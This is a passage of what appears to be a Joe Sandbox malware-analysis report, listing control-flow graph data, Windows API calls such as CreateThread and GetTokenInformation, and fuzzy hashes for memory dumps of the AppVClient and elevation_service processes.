                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: d3326afdd22336f733e286be15113a5c04d710070524368559eef70306b5e1b0
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F21EA3171DE848FC76A932844D92B52EA2F795324F9D83CBD08ADB293DB2C4D05D242
                                                                                                                                                                                Function 00748245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 330 748245-748247 331 7482d2-7482d7 330->331 332 74824d-74824f 330->332 333 748306-748309 331->333 334 748251-748260 call 7772f4 332->334 335 74832e-748330 333->335 336 74830b-748311 CloseHandle 333->336 341 748390-748393 334->341 338 748332 335->338 339 7482dd-7482e3 335->339 336->335 338->339 344 748334 338->344 342 7483a3-7483a4 339->342 343 7482e9 339->343 345 74827e 341->345 346 748399 341->346 347 74f524-74f52e 342->347 343->342 348 7482ef 343->348 344->347 345->336 350 748284 345->350 346->345 349 74839f-7483a1 346->349 351 74f807 347->351 354 7482f0-74831c 348->354 349->342 350->335 352 74f80d 351->352 353 74f8df-74f8e0 351->353 352->353 355 74f813 352->355 358 7515a5-7515aa 353->358 365 7481e5 354->365 366 748322 354->366 359 74f78f 355->359 360 74f81b 355->360 362 7515ae-7515af 358->362 359->360 364 74f795 359->364 360->353 363 7515b2-7515b7 362->363 367 7515ba-7515c1 363->367 364->351 368 7482a3-7482a5 365->368 369 7481eb 365->369 366->365 370 748328-74832c 366->370 371 7515c7-7515d2 367->371 372 751750-7517a2 call 7772f4 367->372 373 7483f9 368->373 374 7482ab 368->374 375 7481f1 369->375 376 7482b2-7482bc 369->376 370->335 377 7482c5-7482c8 370->377 379 7515d4-7515d6 371->379 380 751620-751623 371->380 373->331 385 7483ff 373->385 374->373 381 7482b1 374->381 375->376 384 7481f7-74828e 375->384 376->377 383 748357-74836f GetTokenInformation 376->383 377->373 382 7482ce 377->382 387 751670-751684 379->387 388 7515dc-7515df 379->388 391 751625-751628 380->391 392 7516a0-7516b4 380->392 381->376 389 7482d0 382->389 390 74828f-748303 call 7772ec 382->390 398 748376-74837b 383->398 385->347 387->358 400 75168a-75168d 387->400 388->367 397 7515e1-7515f6 388->397 389->331 389->390 390->333 424 74834f-748355 390->424 391->367 399 75162a-751636 391->399 395 7516f4-7516f5 392->395 396 7516b6-7516b9 392->396 414 7516fe-75170c 395->414 404 7516bb 396->404 405 75173a-75173b 396->405 406 7516d2-7516d7 397->406 407 7515fc-751600 397->407 398->354 408 748381 398->408 409 7516dc-7516ec 399->409 410 751638-751640 399->410 401 751693-751697 400->401 402 75172f-751738 400->402 411 7516bf-7516cd 401->411 419 75173f-751740 402->419 404->411 405->419 406->362 413 751606-751618 407->413 407->414 408->354 416 748387 408->416 409->371 415 7516f2 409->415 417 751646-75165f 410->417 418 75170e-751727 410->418 413->363 420 751744-751748 414->420 415->372 416->341 421 748277-74827a 416->421 417->371 423 751665 417->423 418->371 422 75172d 418->422 419->420 426 748241 421->426 427 74827c 421->427 422->372 423->372 428 748341 424->428 429 748212-74821a GetTokenInformation 424->429 426->334 426->398 427->345 427->426 428->429 430 748347 428->430 431 748220-748234 429->431 432 7483af 429->432 430->410 434 74834d 430->434 439 7483d7-7483dd 431->439 440 74823a 431->440 432->334 433 7483b5 432->433 433->334 436 7483bb-7483ca 433->436 434->424 436->421 443 7483d0 436->443 439->373 440->439 442 748240 440->442 445 75b32e-75b330 442->445 443->421 448 7483d6 443->448 446 75b300 445->446 447 75b332-75b337 call 7772f4 445->447 452 75b302 446->452 453 75b2fd 446->453 447->446 454 75b339 447->454 448->439 455 75b305 453->455 456 75b2ff 453->456 454->446 457 75b33b-75b33f 454->457 458 75b322-75b32d 455->458 459 75b308-75b315 455->459 456->459 457->459 458->445 459->455 461 75b317 459->461 461->453
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction ID: 20bfc23f5f6318248f584cd5185995d36bd6232891c7ea64999b736255bba794
                                                                                                                                                                                • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction Fuzzy Hash: 72F0A43590DA99CFDAAA9B18945053EABA0BF91710B5D009AD446CB113CF2C9C01D753
                                                                                                                                                                                Function 00748318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 462 748318-74831c 463 7481e5 462->463 464 748322 462->464 465 7482a3-7482a5 463->465 466 7481eb 463->466 464->463 467 748328-74832c 464->467 468 7483f9 465->468 469 7482ab 465->469 470 7481f1 466->470 471 7482b2-7482bc 466->471 472 7482c5-7482c8 467->472 473 74832e-748330 467->473 480 7482d2-7482d7 468->480 481 7483ff 468->481 469->468 474 7482b1 469->474 470->471 477 7481f7-74828e 470->477 471->472 476 748357-74836f GetTokenInformation 471->476 472->468 475 7482ce 472->475 478 748332 473->478 479 7482dd-7482e3 473->479 474->471 483 7482d0 475->483 484 74828f-748303 call 7772ec 475->484 492 748376-74837b 476->492 478->479 488 748334 478->488 485 7483a3-7483a4 479->485 486 7482e9 479->486 482 748306-748309 480->482 489 74f524-74f52e 481->489 482->473 490 74830b-748311 CloseHandle 482->490 483->480 483->484 484->482 507 74834f-748355 484->507 485->489 486->485 493 7482ef 486->493 488->489 494 74f807 489->494 490->473 498 7482f0-74831c 492->498 499 748381 492->499 493->498 496 74f80d 494->496 497 74f8df-74f8e0 494->497 496->497 501 74f813 496->501 508 7515a5-7515aa 497->508 498->463 498->464 499->498 502 748387 499->502 509 74f78f 501->509 510 74f81b 501->510 505 748277-74827a 502->505 506 748390-748393 502->506 515 748241 505->515 516 74827c 505->516 512 74827e 506->512 513 748399 506->513 520 748341 507->520 521 748212-74821a GetTokenInformation 507->521 517 7515ae-7515af 508->517 509->510 519 74f795 509->519 510->497 512->490 523 748284 512->523 513->512 522 74839f-7483a1 513->522 515->492 524 748251-748260 call 7772f4 515->524 516->512 516->515 518 7515b2-7515b7 517->518 525 7515ba-7515c1 518->525 519->494 520->521 526 748347 520->526 527 748220-748234 521->527 528 7483af 521->528 522->485 523->473 524->506 531 7515c7-7515d2 525->531 532 751750-7517a2 call 7772f4 525->532 533 74834d 526->533 534 751638-751640 526->534 555 7483d7-7483dd 527->555 556 74823a 527->556 528->524 530 7483b5 528->530 530->524 537 7483bb-7483ca 530->537 539 7515d4-7515d6 531->539 540 751620-751623 531->540 533->507 541 751646-75165f 534->541 542 75170e-751727 534->542 537->505 569 7483d0 537->569 545 751670-751684 539->545 546 7515dc-7515df 539->546 548 751625-751628 540->548 549 7516a0-7516b4 540->549 541->531 551 751665 541->551 542->531 550 75172d 542->550 545->508 558 75168a-75168d 545->558 546->525 554 7515e1-7515f6 546->554 548->525 557 75162a-751636 548->557 552 7516f4-7516f5 549->552 553 7516b6-7516b9 549->553 550->532 551->532 571 7516fe-75170c 552->571 561 7516bb 553->561 562 75173a-75173b 553->562 564 7516d2-7516d7 554->564 565 7515fc-751600 554->565 555->468 556->555 566 748240 556->566 557->534 567 7516dc-7516ec 557->567 559 751693-751697 558->559 560 75172f-751738 558->560 568 7516bf-7516cd 559->568 575 75173f-751740 560->575 561->568 562->575 564->517 570 751606-751618 565->570 565->571 574 75b32e-75b330 566->574 567->531 572 7516f2 567->572 569->505 579 7483d6 569->579 570->518 576 751744-751748 571->576 572->532 577 75b300 574->577 578 75b332-75b337 call 7772f4 574->578 575->576 583 75b302 577->583 584 75b2fd 577->584 578->577 585 75b339 578->585 579->555 586 75b305 584->586 587 75b2ff 584->587 585->577 588 75b33b-75b33f 585->588 589 75b322-75b32d 586->589 590 75b308-75b315 586->590 587->590 588->590 589->574 590->586 592 75b317 590->592 592->584
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 0074830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 00748369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: 89681f1f034b7f9b734e47663de04f03086af1d69eb4c92526bba67fce25b068
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: DBF09A3480DA4DCB8AA68A18984063E77A4BF61754B6C006AC846CF122CF2CDC02EB53
                                                                                                                                                                                Function 007483E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 593 7483e7-7483e9 594 7482c5-7482c8 593->594 595 7483ef 593->595 596 7482ce 594->596 597 7483f9 594->597 595->594 598 7483f5-7483f7 595->598 599 7482d0 596->599 600 74828f-748303 call 7772ec 596->600 601 7482d2-7482d7 597->601 602 7483ff 597->602 598->597 599->600 599->601 603 748306-748309 600->603 619 74834f-748355 600->619 601->603 605 74f524-74f52e 602->605 606 74832e-748330 603->606 607 74830b-748311 CloseHandle 603->607 609 74f807 605->609 613 748332 606->613 614 7482dd-7482e3 606->614 607->606 611 74f80d 609->611 612 74f8df-74f8e0 609->612 611->612 615 74f813 611->615 623 7515a5-7515aa 612->623 613->614 618 748334 613->618 616 7483a3-7483a4 614->616 617 7482e9 614->617 624 74f78f 615->624 625 74f81b 615->625 616->605 617->616 622 7482ef 617->622 618->605 626 748341 619->626 627 748212-74821a GetTokenInformation 619->627 634 7482f0-74831c 622->634 628 7515ae-7515af 623->628 624->625 630 74f795 624->630 625->612 626->627 631 748347 626->631 632 748220-748234 627->632 633 7483af 627->633 629 7515b2-7515b7 628->629 637 7515ba-7515c1 629->637 630->609 638 74834d 631->638 639 751638-751640 631->639 665 7483d7-7483dd 632->665 666 74823a 632->666 635 7483b5 633->635 636 748251-748256 call 7772f4 633->636 658 7481e5 634->658 659 748322 634->659 635->636 642 7483bb-7483ca 635->642 656 74825b-748260 636->656 643 7515c7-7515d2 637->643 644 751750-7517a2 call 7772f4 637->644 638->619 645 751646-75165f 639->645 646 75170e-751727 639->646 690 748277-74827a 642->690 691 7483d0 642->691 651 7515d4-7515d6 643->651 652 751620-751623 643->652 645->643 655 751665 645->655 646->643 654 75172d 646->654 661 751670-751684 651->661 662 7515dc-7515df 651->662 663 751625-751628 652->663 664 7516a0-7516b4 652->664 654->644 655->644 657 748390-748393 656->657 670 74827e 657->670 671 748399 657->671 673 7482a3-7482a5 658->673 674 7481eb 658->674 659->658 677 748328-74832c 659->677 661->623 678 75168a-75168d 661->678 662->637 672 7515e1-7515f6 662->672 663->637 675 75162a-751636 663->675 667 7516f4-7516f5 664->667 668 7516b6-7516b9 664->668 665->597 666->665 676 748240 666->676 698 7516fe-75170c 667->698 688 7516bb 668->688 689 75173a-75173b 668->689 670->607 682 748284 670->682 671->670 679 74839f-7483a1 671->679 680 7516d2-7516d7 672->680 681 7515fc-751600 672->681 673->597 692 7482ab 673->692 683 7481f1 674->683 684 7482b2-7482bc 674->684 675->639 685 7516dc-7516ec 675->685 694 75b32e-75b330 676->694 677->594 677->606 686 751693-751697 678->686 687 75172f-751738 678->687 679->616 680->628 697 751606-751618 681->697 681->698 682->606 683->684 701 7481f7-74828e 683->701 684->594 706 748357-74836f GetTokenInformation 684->706 685->643 705 7516f2 685->705 702 7516bf-7516cd 686->702 707 75173f-751740 687->707 688->702 689->707 699 748241 690->699 700 74827c 690->700 691->690 703 7483d6 691->703 692->597 704 7482b1 692->704 695 75b300 694->695 696 75b332-75b337 call 7772f4 694->696 714 75b302 695->714 715 75b2fd 695->715 696->695 717 75b339 696->717 697->629 708 751744-751748 698->708 699->636 711 748376-74837b 699->711 700->670 700->699 703->665 704->684 705->644 706->711 707->708 711->634 716 748381 711->716 719 75b305 715->719 720 75b2ff 715->720 716->634 718 748387 716->718 717->695 721 75b33b-75b33f 717->721 718->657 718->690 722 75b322-75b32d 719->722 723 75b308-75b315 719->723 720->723 721->723 722->694 723->719 725 75b317 723->725 725->715
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: d0993578d4214e89461e15f2a42099941ab94f4f7d0441e3f9b181f78090b28a
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction Fuzzy Hash: E0F09A3590CA4DCB8ABA8A089440A3E6BA4BB61704B6C009AC456CF122CF6CEC02E753

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 00772ED0 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _clrfp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3618594692-0
                                                                                                                                                                                • Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                • Instruction ID: 278c6a852ef54643616afc8d3b10171b507e5fbdb68b51814b35208eccdade8b
                                                                                                                                                                                • Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0DB16731620A4DCFDF99CF1CC88AB6677E1FB49344B598599E85DCB262C339D852CB01

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:66
                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                execution_graph 3862 895b8f 3873 8a53f0 3862->3873 3864 895baf 3878 8981c0 3864->3878 3866 895c2c 3867 895c84 3885 895990 3867->3885 3869 895dcd 3869->3869 3870 895d56 CreateThread 3872 895bbc 3870->3872 3871 895cd4 CreateThread CloseHandle 3871->3872 3872->3866 3872->3867 3872->3870 3872->3871 3874 8a53f4 3873->3874 3875 8a545e VirtualAlloc 3874->3875 3877 8a53f6 3874->3877 3876 8a5460 3875->3876 3876->3874 3877->3864 3880 8981e5 3878->3880 3879 89830b CloseHandle 3879->3880 3880->3879 3881 898357 GetTokenInformation 3880->3881 3882 898334 3880->3882 3883 898212 GetTokenInformation 3880->3883 3881->3880 3882->3872 3883->3880 3884 898220 3883->3884 3884->3872 3887 895994 wcscpy 3885->3887 3886 895a23 3886->3869 3887->3886 3888 895a8d VirtualAlloc 3887->3888 3888->3887 3903 8958de 3904 8a53f0 VirtualAlloc 3903->3904 3905 8958f9 3904->3905 3906 8981c0 3 API calls 3905->3906 3907 895907 3906->3907 3922 898201 3924 898220 3922->3924 3925 8981e5 3922->3925 3923 89830b CloseHandle 3923->3925 3925->3923 3926 898357 GetTokenInformation 3925->3926 3927 898334 3925->3927 3928 898212 GetTokenInformation 3925->3928 3926->3925 3928->3924 3928->3925 3951 895d50 CreateThread 3953 895bbc 3951->3953 3952 895cd4 CreateThread CloseHandle 3952->3953 3953->3952 3954 895c84 3953->3954 3955 895c2c 3953->3955 3957 895d56 CreateThread 3953->3957 3956 895990 VirtualAlloc 3954->3956 3958 895dcd 3956->3958 3957->3953 3958->3958 3908 8981e3 3912 8981e5 3908->3912 3909 898357 GetTokenInformation 3909->3912 3910 89830b CloseHandle 3910->3912 3911 898212 GetTokenInformation 3911->3912 3914 898220 3911->3914 3912->3909 3912->3910 3912->3911 3913 898334 3912->3913 3936 895d22 3937 895cd4 CreateThread CloseHandle 3936->3937 3938 895bbc 3936->3938 3937->3938 3938->3937 3939 895c2c 3938->3939 3940 895d56 CreateThread 3938->3940 3941 895c84 3938->3941 3940->3938 3942 895990 VirtualAlloc 3941->3942 3943 895dcd 3942->3943 3943->3943 3889 8983e7 3890 8981e5 3889->3890 3891 898334 3890->3891 3892 89830b CloseHandle 3890->3892 3893 898212 GetTokenInformation 3890->3893 3894 898357 GetTokenInformation 3890->3894 3892->3890 3893->3890 3895 898220 3893->3895 3894->3890

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 008981C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 8981c0-8981d8 1 8983bf-8983ca 0->1 3 8983d0 1->3 4 898277-89827a 1->4 3->4 7 8983d6 3->7 5 89827c 4->5 6 898241 4->6 5->6 8 89827e 5->8 9 898251-898256 call 8c72f4 6->9 10 898376-89837b 6->10 11 89830b-898311 CloseHandle 8->11 12 898284 8->12 18 89825b-898260 9->18 14 898381 10->14 15 8982f0-89831c 10->15 17 89832e-898330 11->17 12->17 14->15 16 898387 14->16 30 898322 15->30 31 8981e5 15->31 16->4 20 898390-898393 16->20 21 8982dd-8982e3 17->21 22 898332 17->22 18->20 20->8 23 898399 20->23 25 8982e9 21->25 26 8983a3-8983a4 21->26 22->21 27 898334 22->27 23->8 29 89839f-8983a1 23->29 25->26 32 8982ef 25->32 28 89f524-89f52e 27->28 35 89f807 28->35 29->26 30->31 36 898328-89832c 30->36 33 8981eb 31->33 34 8982a3-8982a5 31->34 32->15 39 8981f1 33->39 40 8982b2-89836f GetTokenInformation 33->40 37 8983f9 34->37 38 8982ab 34->38 42 89f80d 35->42 43 89f8df-89f8e0 35->43 36->17 41 8982c5-8982c8 36->41 48 8983ff 37->48 49 8982d2-8982d7 37->49 38->37 44 8982b1 38->44 39->40 45 8981f7 39->45 40->10 41->37 47 8982ce 41->47 42->43 50 89f813 42->50 51 8a15a5-8a15aa 43->51 44->40 52 89828e 45->52 53 89828f-898303 call 8c72ec 47->53 54 8982d0 47->54 48->28 55 898306-898309 49->55 59 89f81b 50->59 60 89f78f 50->60 58 8a15ae-8a15af 51->58 52->53 53->55 66 89834f-898355 53->66 54->49 54->53 55->11 55->17 62 8a15b2-8a15b7 58->62 59->43 60->59 63 89f795 60->63 65 8a15ba-8a15c1 62->65 63->35 67 8a1750-8a17a2 call 8c72f4 65->67 68 8a15c7-8a15d2 65->68 76 898341 66->76 77 898212-89821a GetTokenInformation 66->77 70 8a1620-8a1623 68->70 71 8a15d4-8a15d6 68->71 78 8a16a0-8a16b4 70->78 79 8a1625-8a1628 70->79 74 8a15dc-8a15df 71->74 75 8a1670-8a1684 71->75 74->65 83 8a15e1-8a15f6 74->83 75->51 80 8a168a-8a168d 75->80 76->77 86 898347 76->86 84 8983af 77->84 85 898220-898234 77->85 81 8a16b6-8a16b9 78->81 82 8a16f4-8a16f5 78->82 79->65 87 8a162a-8a1636 79->87 88 8a172f-8a1738 80->88 89 8a1693-8a1697 80->89 91 8a173a-8a173b 81->91 92 8a16bb 81->92 102 8a16fe-8a170c 82->102 93 8a15fc-8a1600 83->93 94 8a16d2-8a16d7 83->94 84->9 90 8983b5 84->90 111 89823a 85->111 112 8983d7-8983dd 85->112 95 8a1638-8a1640 86->95 96 89834d 86->96 87->95 97 8a16dc-8a16ec 87->97 99 8a173f-8a1740 88->99 100 8a16bf-8a16cd 89->100 90->9 101 8983bb-8983bd 90->101 91->99 92->100 93->102 103 8a1606-8a1618 93->103 94->58 105 8a170e-8a1727 95->105 106 8a1646-8a165f 95->106 96->66 97->68 104 8a16f2 97->104 108 8a1744-8a1748 99->108 101->1 102->108 103->62 104->67 105->68 109 8a172d 105->109 106->68 110 8a1665 106->110 109->67 110->67 111->112 113 898240 111->113 114 8ab32e-8ab330 113->114 116 8ab332-8ab337 call 8c72f4 114->116 117 8ab300 114->117 116->117 125 8ab339 116->125 120 8ab2fd 117->120 121 8ab302 117->121 123 8ab2ff 120->123 124 8ab305 120->124 126 8ab308-8ab315 123->126 124->126 127 8ab322-8ab32d 124->127 125->117 128 8ab33b-8ab33f 125->128 126->124 130 8ab317 126->130 127->114 128->126 130->120
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                • Instruction ID: 6a51d790b5dbe5ee762e12d94b461db000525e595eb8b6c007d57ca801706afe
                                                                                                                                                                                • Opcode Fuzzy Hash: 8df0ac1401ce2cdb2d999bdf71bb41ab150bf242135a1906e3b3b3c900401258
                                                                                                                                                                                • Instruction Fuzzy Hash: 60B1153051CA4ACBEF29DB5C8484235B7A1FFA7318F2C8259D48BC7A66DE24DC02D352
                                                                                                                                                                                Function 00895B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 895b8f-895c20 call 8a53f0 call 8c8358 call 8b0320 call 8981c0 141 895cf4-895d08 call 8c72ec 131->141 142 895c26 131->142 146 895d0e 141->146 147 895c87-895dc8 call 895e60 call 895990 141->147 142->141 143 895c2c-895c2f 142->143 146->147 149 895d14-895d18 146->149 162 895dcd 147->162 152 895daf-895db6 call 8952d0 149->152 153 895c65 149->153 164 895dbc 152->164 165 895c30-895c39 152->165 155 895ca3 call 895df0 153->155 156 895c67 153->156 170 895c45-895d6d call 8b1520 155->170 156->155 160 895c69-895c9d 156->160 182 895c9f 160->182 183 895c85 160->183 162->162 167 895d7d-895d89 164->167 168 895dbe 164->168 177 895cb9-895cbd 165->177 178 895bf7 165->178 179 895d8b-895d92 167->179 180 895d94 167->180 168->167 181 895d9b 168->181 185 895bfd-895c06 170->185 193 895d73 170->193 186 895cc3 177->186 187 895d56-895d5b CreateThread 177->187 178->177 178->185 179->180 188 895d9c 179->188 180->143 191 895cb3 180->191 181->188 182->183 190 895ca1 182->190 183->147 195 895da5-895da8 185->195 186->187 194 895cc9 186->194 197 895d1f-895d45 187->197 198 895c7e 187->198 188->195 190->155 191->143 191->177 193->185 199 895d79-895d7b 193->199 194->187 195->152 202 895cd4-895cea CreateThread CloseHandle 197->202 203 895d47 197->203 198->197 200 895c84 198->200 199->167 200->183 202->179 205 895cf0-895d4d 202->205 203->202 205->180
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction ID: 906209a43a483aeb561a01a8c4c0c4d44e20d0579002baf152acb6d1da492f27
                                                                                                                                                                                • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction Fuzzy Hash: 6441E520608F0D8FDF6BB72C945973936E0FB9932CF5C01BAE406CB1A5DB248D059752
                                                                                                                                                                                Function 00895D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 207 895d22-895d45 208 895cd4-895cea CreateThread CloseHandle 207->208 209 895d47 207->209 211 895d8b-895d92 208->211 212 895cf0-895d4d 208->212 209->208 214 895d9c 211->214 215 895d94 211->215 212->215 217 895da5-895db6 call 8952d0 214->217 218 895c2c-895c2f 215->218 219 895cb3 215->219 230 895dbc 217->230 231 895c30-895c39 217->231 219->218 220 895cb9-895cbd 219->220 222 895cc3 220->222 223 895d56-895d5b CreateThread 220->223 222->223 226 895cc9 222->226 228 895d1f-895d45 223->228 229 895c7e 223->229 226->223 228->208 228->209 229->228 232 895c84-895dc8 call 895e60 call 895990 229->232 234 895d7d-895d89 230->234 235 895dbe 230->235 231->220 241 895bf7 231->241 250 895dcd 232->250 234->211 234->215 235->234 243 895d9b 235->243 241->220 244 895bfd-895c06 241->244 243->214 244->217 250->250
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.3357007123.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_890000_elevation_service.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: 1f4e436377805d58bd9129795b00b774f02b0d0c2c894cf141eb7cccbb690aaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: A3F0F02161CE0986DF3FB738985933A62C1F79933DF6C0B3ED057C90E8EA2489029309
                                                                                                                                                                                Function 00895D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
